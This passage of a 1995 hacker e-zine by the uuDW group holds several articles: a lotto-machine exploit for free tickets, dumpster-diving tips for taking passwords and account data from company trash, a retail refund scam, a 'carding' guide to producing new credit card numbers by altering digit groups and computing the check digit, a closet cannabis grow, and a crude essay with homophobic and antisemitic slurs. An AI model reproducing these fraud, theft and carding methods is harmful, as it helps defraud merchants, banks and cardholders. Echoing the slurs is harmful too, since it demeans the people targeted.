flaws... This is for informational purposes only, and use of this material
for illegal activities is not suggested...

Now that that's outta the way, a diagram might be in order:
__________________________________________
| _____ |
| Instant Lotto Machine ||__A__|| |
| |
| _______ _______ _______ |
| | X | | Y | | Z | |
| |_______| |_______| |_______| |
| _______ _______ _______ |
| |___1___| |___2___| |___3___| |
|__________________________________________|

To do get this trick to work, you need two $1.00 bills. Slide the first
dollar into slot 1, 2 or 3 (being the slot which the tickets would come out
of for tickets X, Y and Z respectively)... For example, if you wanted ticket
X, you'd place your first dollar in slot 1. Next, put your other dollar in
slot A. This should cause tickets to come spewing out of the slot in which
you placed your first dollar (at least until the dollar falls out, or the
machine jams, etc)...
If you were to do it, I wouldn't recommend doing it too often, mainly
because it looks slightly suspicious if you're always at the Lotto Machine.
Also, these machines are usually placed in positions which are wide open, and
easily seen by people with status (i.e. don't fuck around)...
I hope this file somewhat enlightened you to the faults of a fairly
popular machine, but I recommend not trying it as it's probably considered
fraud in most parts of the country. :)

Free the Information, Spread the Knowledge.

Crax/uuDW

--- Trashing Techniques

So you want to go trashing eh? Well, it's easy, fun and highly
productive; if you follow a few simple tips. I've been trashing around my
city for years, and could go on and on about the fun times, and close calls
I've had. Trashing, is simply glorified trash picking. If the thought of
this makes you queasy, you might as well stop reading, as this is no use for
you.
The first thing to do is decide what your target will be. A local phone
company office, university or corporation is a good one. These are good if
you are looking for Internet dialups, passwords, account info, or anything
else that would be on computer printouts. You will be amazed at the amount of
valuable information just carelessly tossed away. If you're looking for
hardware, a renovating company will sometimes throw out valuable, though
slightly outdated computer peripherals. I've seen hard drives in garbage bags
just asking to be brought home. Don't forget those drives once had
information on them too. Once you've gotten that out if the way, the plans
begin.
A reliable source of transportation is essential. I think a pickup truck
is the best way to go. Both people and your loot will fit in the bed. Not to
mention a quick getaway is easier if you don't have to jump behind seats and
over your friends. If you don't have access to a truck, just make sure you
won't be using a little compact import. You will have a little trouble,
believe me.
Scope out your target dumpster. Look for anything that will hinder your
access such as locks, cameras, security guards, traffic, etc. And be
prepared for the quickest way in. Look for your route to and from the area,
and notice the visibility you will have from the actual spot of your
surroundings. This will be benificial for a safe lookout.
A lock and chain will be easily defeated with a small crowbar. If you
are good with a set of picks, then try that. I just think it takes up
valuable rummaging time. Cameras are a little tricky, and I tend to avoid
them. If you are bold enough, wear dark clothing, and stay out of the direct
view of the lens. Don't try to disable the camera of tamper with it in any
way. If there is someone watching, this is the easiest way to bring attention
to the monitor with your face all over it.
Security guards are easy. Most of them do rounds the same way, at the
same time each night. Just watch their habits for three nights in a row, and
plan accordingly. Remember, they can't wait to go back and sit in the office
with coffee and doughnuts. Traffic isn't a big deal, unless your dumpster of
choice is in plain view of a highway, or a busy road. If it is, be prepared
to have a visit from the local authorities. (Tipped by a concerened citizen).
Have a story ready.
Now, once you've planned for every scenario, it's time to head out. You
will need to have a person in the dumpster to pass out bags, a person to bring
the bags to the vehicle, a driver, and a person to start searching through
your loot. The last person is optional, as it is advisible to take the bags
to a safe location to be searched.
When leaving the area, don't drive with your headlights off. This is a
sure-fire way to bring attention to yourself. Just simply drive away. With
these techniques, you will have many safe, and productive trips to a dumpster
near you. I in no way accept responsibility for the actions of others who may
read this. And in typing this article, my soul intent is to spread public
knowledge.

ThundR/uuDW

--- Blockbuster Video Game Scam

This scam is fairly easy and can be very profitable. First of all you
will need anywhere from $5 to $20 dollars, and a Blockbuster Video store.
Blockbuster Video is always selling previously played SNES, Sega Genesis
and Sega CD games for low prices, between $5 and $20 dollars. The boxes are
already shrink wrapped and the game is not in the box it's handed to you
seperately (which comes in handy later on).
All you do is go to Blockbuster Video, buy a game (I prefer to buy Sega
CD games for the simple reason that they are more expensive when bought new).
Next CAREFULLY take off any stickers attached to the wrap (to get the sticky
shit off that is left behind just use nail polish remover).
Then all you do is go to your friendly neighborhood Kmart, Walmart, or
any such store (I don't recommend Target). Take the game to the electronics
department, not the return desk (this helps the process move quicker)
approach the young pimple faced counter boy with the game in a bag. When he
asks: "May I help you?" You wanna say "YES", tell him your mom had bought
the game a week ago for your birthday and that you already had it, or some
shit like that. Of course if your 30 years old your not going to say that, so
come up with an excuse. He might ask you for a receipt, if this happens
simply say it was a gift and you don't have it. You are usually allowed 2
returns without a receipt to each store, after that they will enforce a
receipt rule, but that's okay just go to another store. He will take the box,
put it under the counter and give you the full amount they are selling the
game for (which is about 3 times what you paid for it, sometimes more). You
still have the game itself (which you can keep or sell to a friend or a game
store).
Here are a few ideas you can use when doing this scam. Of course you can
do this scam anytime of the year, but I suggest you go crazy after Christmas
and major holidays, when returns come in every minute. Also, never just walk
into the store with the box in your hand (no bag) it does look somewhat
suspicious. Another important concept is who should you argue with if
a refund isn't given, if the young pimple faced faggot doesn't give it to you
argue with him and ask for the manager. The manager will most likely give you
the money very quickly to avoid further complications. If he doesn't believe
you, then go to another store (never argue with the manager). After you run
the scam a few times you will get good and make alot of money. If you happen
to have a friend in the electronics department then you've got it made, just
cut him off a piece of the action and your rich... :)

Lord Xeen (WarToy)

--- How the Numbering on CC's Works And How People Change Them.

<Some information taken from Phrack Magazine - Stumble>

Credit card Format: TBBB-LLLL-XXXX-XXXC

T = Type
B = Branch of bank
L = Limit/experation date
X = Identification purpose
C = Checksum

Type of cards... (The letter T in the Example):

3 = American Express Card
4 = VISA Card
5 = MasterCard
6 = Discover Card

Branch codes, different for each type of card:

VISA

BBB Bank
--- ---------------------------
019 Bank of America
024 Bank of America
052 First Cincinatti
060 Navy Federal Credit Union
128 Citibank
131 State Street Bank
215 Marine Midland
225 Chase Manhattan
231 Chase Lincoln First Classic
232 Chase Lincoln First Classic
241 Nat. Westminester Bank
250 First Chicago Bank
271 Citibank Preferred
302 H.H.B.C.
310 Imperial Savings
317 Gold Dome
387 Bank One
428 Bank of Hoven
811 Bank of Hawaii
897 Village bank of Cincinatti

MasterCard

BBB Bank
--- ---------------------------
215 Marine Midland
217 Manufacturers Hanover Trust
233 Huntington Bank
242 Chevy Chase Federal Savings
254 Bank of America
263 Chemical Bank
273 Bank of America
286 Chase Lincoln First
317 Norwest
323 Bank of New York
329 Maryland Bank NA (MBNA)
410 Citibank Preferred
411 1st Fin. bank of Omaha
414 Nat. Westminester Bank
415 Colonial National Bank
424 Citibank
465 Chase Manhattan
678 Marine Midland

III. Bank Codes (International Bank or Interlink Numbers):

These are used in checking credit. Later on, you will learn that while
checking the credit cards for the amount of credit, you will be prompted to
enter the Bank ID along with the Merchant ID. The bank ID's are, I believe,
from the following list. One note -- you cannot just choose any Bank ID and
use it with any Merchant ID. They must correspond in some way. How, I don't
know.
I THINK that a bank issues a merchant number to each of their customers.
If you try to use a merchant number with a bank number, and the merchant
doesn't actually use the bank that is specified by the bank number, you are
going to get some problems. (i.e. The verification won't go through.) Again,
I will state that this is only a theory. The reason that I post this theory
is to get minds working. So far, no one has mentioned their ideas on the
function of Bank Codes.
If you do happen to find out the true meaning of these numbers, please
get in touch with me so I can update this list. Thanks! One word -- on VISA
credit cards, the Bank ID's are the first 4 digits of the Card. For
MasterCards, however, they vary. A list follows:

Bank Bank Code
--------------------------- ------------
Chemical Bank 1263
Marine Midland 6207 (1207?)
Manufacturers Hanover Trust 1033
Citibank 1035
Huntington 1226
First Card Gold 1286
MBNA 6017
Chase Manhatten 1665
[Bank from 5127] 1015

The LLLL part, or the second group on a credit card in from the left,
contains some VERY useful information about the card. This group holds the
information on the Maximum Expiration Date and the Maximum Credit Limit. (I
believe that you can all see the benefits of this.) This does not mean,
however, that the ACTUAL expiration date and ACTUAL credit limit are in this
group. What it means is this: When the different Credit Card Companies issue
Credit Cards to the consumer, he of course has a credit limit. And when the
Companies formulate credit cards, they create certain groups for certain
customers. That is, certain "groups" contain all the credit cards for people
with a credit limit between $X and $Y.
The same thing goes with the expiration dates. Everyone whose card
expires after M1/Y1 and before M2/Y2 has their credit card in a certain group
formulated by the company. For example: My name is Joe Schmoe. My VISA
credit card expires in January of the year 1999. My credit limit on this card
is $7,000. My credit card number (CCN) will probably be in the same group as
my brother-in-law Jack Koff whose card expires in December of 1998 and whose
credit limit is $6,000. BUT, our cards will be in different groups entirely
than my boss' whose card expires in June of 1995 and whose credit limit is
$40,000.
Back to the point of section IV: Lets say you have a credit card with a
known expiration date and known credit limit. Lets also say that you happen
upon ANOTHER credit card whose numbers are the same up until the last 2
groups. (You and I see that these two cards were issued by the same bank and
PROBABLY have a credit limit in the same ball park and an expiration date not
far from each other.) BUT, even though you have this new credit card, you
lost the expiration date and credit limit. GOSH! How are you going to use
this card when you don't know this information?! APROXIMATE! You have a
general idea now, and you can go from there.
One warning here: I have found that small groups of cards with high
credit limits are often hidden in between large groups of cards with very low
credit limits. For instance, lets look at this card: 4123 4567 8901 2345.
From -4567 until 4600 in group 3 (from the right) gold cards may exist. But
after 4600 and before 4567, cards with credit limits of $500 exist. Kind of
sucks, huh?! Just wanted to make you aware of this.
Now, once you learn how to modify these without hurting the card, you
have increased your value as a carder by 100x. But be careful. Often when
you modify a card's group 3 to get a higher credit limit line of cards, you
will find the entire line is dead. Or, in other cases, just the original card
you find is dead, and all surrounding cards are valid with the new credit
limits.

V. "Group 2" & "Group 1"

These two groups, or the last two groups on the credit card, are the
easiest to modify. By changing these in such a way, you can formulate new
credit cards simply by doing a little math in your head. These two groups
contain the IDentification codes. Later on in your carding ventures, you
might find out how to change these, and thus, you have found the secret to a
vault of new and awaiting credit cards. I stress here that the only purpose
that these two groups serve is to differentiate between customers. If the
first two groups of two cards are the same and the last two groups of two
cards are different, the two cards were issued by the same bank and probably
have similar credit limits, but are of course issued to different people. So
I'm sure you could play around with those on your own to get new CC numbers.

Now the tricky part is the last digit, the checksum...

What's the checksum for? It's to stop people from making up their own
cards. But its easy to calculate. (With instructions):

Credit Card. XXXX-XXXX-XXXX-XXXC (fill in numbers from above).

X is a number, and C (the key to the formula) is a check-digit. Ignore
the check-digit (we'll create one) fill in the X digits with numbers (zero
through nine). Take every odd digit (from right to left) and multiply it by
two, if the resulting number is greater than or equal to ten subtract nine.
Do this for all of the odd digits and add the results together. Next add all
of the even digits to the total calculated the resulting number find the next
higher multiple of ten and subtract out the result from it.

Stumble/uuDW

--- The Secret Hydro Closet Garden

To jump to the instructions I put the credits last. We want to make a
small garden without Ma or the 5-0 finding out, eh? Well, go to the local
hardware store and get the following things...

Two 5 gallon buckets (the kind that sheetrock shit comes in).
A small pouch of seeds (hemp of course).
Two good size bags of fertilized top soil, cow manure, etc...
One florescent grow light (or the iced white type).
A hand-held blow torch (you should be able to find one in Radio Shack).
2 cartridges of CO2 (used for pellet guns).
A length of rubber tubing (it must fit the head of the torch).

* Wash your hands before ALL of this!

Okay, place the first bucket on top of the other, hinge them anyway you
find necessary, that will be your lid, or top half. At this point you should
have two buckets, one on top of another. Now cut a "V" shape directly in the
back the top 5 gallon bucket, this "V" shape should be half the length of the
bucket, this will be used for direct lighting. Fill the lower bucket
with the top soil.
Mount one end of the tubing to the head of the torch; mount the torch on
the ouside of the top bucket, the torch will not be used as a torch in this
project, it will be used as a virtual breathing apparatus for the Cannabis, by
replacing the butane capsules with CO2 cartidges. Drill a hole in the top
bucket on the side approximately the same size if not a little smaller than
the rubber tubing. It should be close to the area where you've already
mounted the butane torch. Drive the hose thruogh the hole and let the hose
dangle within the bucket so that it would be pointing at the Cannabis
plant(s).
Mount the florescent light to the inside closet wall towards the back
then face the "V" shaped hole towards the light so the budz will BUD. When
planting the seeds be sure to make sure they are already to BUD (germinate),
in order to make happen get a clean Burger King ashtray fill it with water,
then leave some seeds in there until they've started. Then you pick them up
carefully and gently poke them into the top soil so that they are buried about
one inch deep. Every tenth day turn the light out and cover the "V" shaped
hole and turn the torch with the C02 cartridges to very low, do this until
both CO2 cartridges are empty, then uncover the "V" shaped hole to release CO2
gas. After which you simply turn the light back on and start all over
again until that fat green bud starts growin.
When that CO2 gas hits the hemp, it doubles the hit, becomes greener and
tastier too! More to come later... %)

O.D.

!!!

--- Microsoft Windows '95

The Microsoft Windows 3.x operating system is not really an operating
system at all, even though it is referred to as one. It is a graphical cover-
up of DOS, with some environment-specific functions to it. Users who did not
want to learn how to use DOS could take the easy way out and use Windows.
Windows '95 will change this

  
entirely; there is no DOS beneath the Windows,
making it a true operating system.
This is a good move for Microsoft, since they will be able to make things
that much easier for computer users, especially in the domain of inexperienced
users. By eliminating DOS altogether, Windows '95 effectively turns the PC
platform into a Macintosh look-alike platform. It is a bad move, however, for
the future of the PC scene as a whole. People were once forced to learn how
to use DOS, which in turn led them to learn more about the system they were
working on, and understand how it worked. Knowledge was always a key asset in
the world of computers. Win95 will change all that by allowing people who
know little or nothing about their computer to access the Internet, take
advantage of "plug and play" capabilities, and do so without knowing exactly
what is happening since Win95 hides it from them.
Win95 is destined to boost PC sales. That's how Microsoft planned it.
From these sales, Microsoft will benefit nicely. Money corrupts everyone. By
releasing Win95, Microsoft will open up the ultimate demise of America;
traditionally, Americans are lazy, and this will just extend an open hand to
those who want to get more from doing less. Advances in the personal computer
industry did not come by accident; people had to struggle to create software
and the systems that run it.
Piracy will slow Microsoft's profitability on the new Win95 OS. I
remember seeing pirated copies of "Chicago" on the Internet as early as May
1994, and that was probably not even the start of it. Even now, pirates are
rushing out to get the newest beta builds of Win95. It is 20 disks long, if
not more, and that means a 5 hour download at 14400 bps. In other words, some
of these pirates are just damn crazy.
Then again, pirated copies of IBM's OS/2 Warp operating system also were
abundant on the net, and it could be said that piracy is free publicity.
People are able to test a program before buying it (if they are honest), and
if the program is good enough, they might buy it to avoid getting a virus or
trojan in their pirated copy. Another reason people might buy their own copy
is if the "crack" for the program is faulty, the program might not function
correctly. In any event, IBM's OS/2 Warp has become a popular operating
system, but what would it be like if it hadn't circulated the Internet?
I've heard stories of confused computer owners asking where the "Any"
key is on their keyboard (when prompted to "Press any key"). Another confused
computer owner called a hotline to report that her computer's footpedal didn't
work. She later discovered that she was supposed to place her hand over this
small white gadget, and that it was a pointing device, not a footpedal (better
known as a mouse). Another individual had recently purchased a system with a
fax-modem, and had tried for hours to hold pages up to his monitor and press
buttons, but couldn't send faxes. He later learned about fax software. These
are the kinds of things that any 12-year-old computer geek would already know.
When the Win95 operating system becomes available to the public, there
will be a new and growing population of computer users. According to Wired
Magazine, Microsoft is anticipating 30,000 customer-service calls daily after
the release of Win95. I don't want to be the one answering the technical
support phones. I don't want to be the one showing someone how to turn their
computer on. I don't want to overhear someone saying, "I just bought a
Pentium system with 16 megabytes of RAM, a 28800 bps fax-modem, a laser
printer, and a 1 gig hard drive. Now, what do I do with it?"
Misinformation is the cause of stupidity in the world. If people would
be open to learning instead of simply taking the easy way, this world might
actually get somewhere.

GraveDigger/uuDW

--- My feelings on Nazi's

Nazi's suck... The other day I was watching MTV, some stupid fucking
video came on and it had tons of little Nazi symbols, and pictures of Adolf
Hitler. I watched it for a few minutes and couldn't understand why they
worship a man with no sense of fashion! Now if Hitler had a gotee I could see
him getting some respect, but no... He's got a little stupid miniture "I am
not manly enough to grow a real mustache" mustache... Jeeze...
Those damn swastika's... They have them on everything... I bet the real
X-treme even tattoo the symbol on their ass so that when the ass pirates come
to fuck 'em they know that it's a virgin piece of ass.
Now I can understand why Nazi's hate fags, I am slightly homophobic
myself. But I only get that way when guys try to come onto me... And I
figure if he gets off on fucking a dude up the ass that just means more pussy
for me...
Now onto the subject of Jews... Jews kick ass! Look at those neat
things that they do with their hair. Those fat ass curls... God those are
fresh! Also who cares if Jews killed Christ or whatever the fuck they are
blamed for... He would've died eventually... I'm a slightly religious
person, but I don't think that we should punish a whole group of people for a
mistake a few stupid fucks made.
Another bonus about Jews is that they are usually pretty honest. They
don't go around stealing shit, they start a jewlry store and rob us blind when
we are getting married. (Ex. When was the last time you were mugged by some
Jewish guy with his neato hat on? Never right? My point exactly.)
Now... Hmm... There are MANY more things I could go into... I could
bash a few groups for sporting the "swastica" in there logos... But I don't
feel the need at this moment... Peace out... Gotta love them Jews! :)

^
/ \
/ \
________/_____\________
\ / \ /
\ / \ /
\ / / \ /
\/ \/\ \/
/\ \/\ /\
/ \ / / \
/ \ / \
/______\_______/______\
\ /
\ /
\ /
V

Lets all get along... Flames welcome! (End Note: I just write articles
about shit, I dont agree with what I say if you got a prob with me, then like
bite me. I'm just a bored writer that sez stupid shit when he's high)

Stumble/uuDW

!!!

--- Submission Guidelines

Text articles intended for publishing in RaGE should follow these guidelines:

1. Indent all paragraphs by 5 spaces.
2. Do not exceed 80 columns.
3. Do not leave blank lines between paragraphs.
4. Leave one space after a comma, two spaces after a period.
5. When including multiple periods, use three in a group... (like that!)
6. Reprinted articles from magazines or newspapers should include your
reaction, and not just be by itself.
7. Try to avoid words like "eleet", "k-rad" and FuNKy CaPS TyPiNG. We are
trying to be informative here, not pseudo-elite.
8. Give your article a title at the top, and sign with your handle at the
bottom of your article.
9. Do not submit fictitious or false information.
10. Spell-check your article before submission.
11. Do not submit something that has already been printed.
12. Do not submit scan lists older than 2 months old.
13. Do not include source code that will not compile.
14. All submissions become sole property of RaGE Magazine, and the uuDW.
These submissions can not be reprinted without written consent of the
editor of RaGE. Reprinted text and articles are an exception.

These guidelines are meant for you to help us by properly preparing your
submission before sending it to us. It saves us a lot of time in editing,
proofreading, and it keeps us happy.

,
.úù-ÄÄÄ[]Ä uuDW Role Call as of 03/12/95 Ä[]ÄÄÄÄÄ--Äùø

ÚÄùú. .úùÄÂÄ-Äùú. .úù-ÄÄÂÄ-Äùú. .úù-ÄÄÂÄÄÄ--Äùú. .úù--ÄÄÄÄ¿
³ Section ³ Title ³ Handle ³ Internet Mail Address ³
ÃÄùú. .úùÄÅÄ-Äùú. .úù-ÄÄÅÄ-Äùú. .úù-ÄÄÅÄÄÄ--Äùú. .úù--ÄÄÄÄ´
³ Coordi- ³ USA Coord ³ GraveDigger ³ uudw@cyberspace.org ³
³ nators ³ Canada Coord ³ Downtown ³ ³
ÃÄùú. .úùÄÅÄ-Äùú. .úù-ÄÄÅÄ-Äùú. .úù-ÄÄÅÄÄÄ--Äùú. .úù--ÄÄÄÄ´
³ Senior ³ Asst. Coord ³ Grendel ³ vasouthw@mailbox.syr.edu ³
³ Staff ³ Asst. Coord ³ NiGhTmArE ³ an150035@anon.penet.fi ³
³ ³ NetCoord/PR ³ Sandman ³ sandman@bbs.scsd.k12.ny.us ³
ÃÄùú. .úùÄÅÄ-Äùú. .úù-ÄÄÅÄ-Äùú. .úù-ÄÄÅÄÄÄ--Äùú. .úù--ÄÄÄÄ´
³ Members ³ ³ Rhythm Greene ³ ³
³ ³ ³ PSYC0SiS ³ ³
³ ³ ³ Howler ³ an158401@anon.penet.fi ³
³ ³ ³ NeuromanceR ³ caoimhin@fpg.gcomm.com ³
³ ³ ³ Mr. Orange ³ ³
³ ³ ³ sTumble ³ ³
³ ³ ³ Crax ³ crax@freeside.scsd.k12.ny.us ³
³ ³ ³ Bluesman ³ ³
³ ³ ³ Thunder ³ ³
ÀÄùú úùÄÁÄ-Äùú úù-ÄÄÁÄ-Äùú úù-ÄÄÁÄÄÄ--Äùú úù--ÄÄÄÄÙ
,
.úù-ÄÄÄ[]Ä uuDW Affiliate Boards Ä[]ÄÄÄÄÄÄÄÄÄÄÄÄÄ--Äùø

ÚÄÄ--Äùú. .úù--ÄÄÄÂ--ùú. .úù-ÄÂÄ-Äùú. .úù-ÄÄÂ-ùú úùÄÂ-ùú úùÄÂ--ùú. .úù-Ä¿
³ Board ³ Sysop ³ Number ³ Bps ³ HD ³ uuDW/neT ³
ÃÄÄ--Äùú. .úù--ÄÄÄÅ--ùú. .úù-ÄÅÄ--ùú. .úù-ÄÄÅ-ùú úùÄÅ-ùú úùÄÅ--ùú. .úù-Ä´
³ EtERNiTY ³ NiGhTmArE ³ 3i5.DoWN.NoW ³ 144oo ³ 1 GiG ³ 242:1/1 ³
³ þ uuDW World HQ þ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³
³ þ NorthEast HQ þ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³
³ Ut0PiA ³ PSYC0SiS ³ 3i5.656.5i35 ³ 288oo ³ 1 GiG ³ 242:1/2 ³
³ þ Home of RaGE! þ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³
³ Independent Nation³ Crax ³ 3i5.656.4i79 ³ 144oo ³ 7ooMB ³ ³
³ World of Filth ³ Lord Xeen ³ CoM.iNG.SooN ³ ³ 3.5GiG³ ³
ÃÄÄ--Äùú. .úù--ÄÄÄÅ--ùú. .úù-ÄÅÄ--ùú. .úù-ÄÄÅ-ùú úùÄÅ-ùú úùÄÅ--ùú. .úù-Ä´
³ ragNARok ³ Poet-X ³ 6i9.443.SCaN ³ 144oo ³ 1 GiG ³ 242:666/1 ³
³ [NODE 2] ringdn ³ ^^ ³ 6i9.TRy.SCaN ³ 288oo ³ ^^ ³ ^^ ³
³ þ West Coast HQ þ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³ ^^ ³
³ tHE RiVER StYX ³ Dark Soul ³ 4o8.239.o783 ³ 288oo ³ 1 GiG ³ 242:666/2 ³
ÀÄÄÄ--Äùú úù--ÄÄÄÄÁÄ--ùú úù-ÄÄÁÄ--Äùú úù--ÄÄÁÄùú úùÄÁ-ùú úùÄÁÄ--ùú úù-ÄÄÙ

If your BBS is missing from this list, you have to get in contact with
one of the senior staff members or coordinators. Your board has most
likely been removed because we have not heard from you in a while.

,
.úù-ÄÄÄ[]Ä uuDW Contact Info Ä[]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--Äùø


Send eMail to uudw@cyberspace.org

Find our RaGE magazine on these anonymous FTP archives:

ftp.fc.net /pub/defcon/RAGE
paranoia.com /pub/zines/rage
ftp.rahul.net /pub/lps/comp_cult

WWW page is in the works. Watch for it soon.
,
.úù-ÄÄÄ[]Ä End Ä[]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--Äùø



← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Francesco's profile picture
Francesco Arca (@Francesco)
14 Nov 2024
Congratulations :)

guest's profile picture
@guest
12 Nov 2024
It is very remarkable that the period of Atlantis’s destruction, which occurred due to earthquakes and cataclysms, coincides with what is co ...

guest's profile picture
@guest
12 Nov 2024
Plato learned the legend through his older cousin named Critias, who, in turn, had acquired information about the mythical lost continent fr ...

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT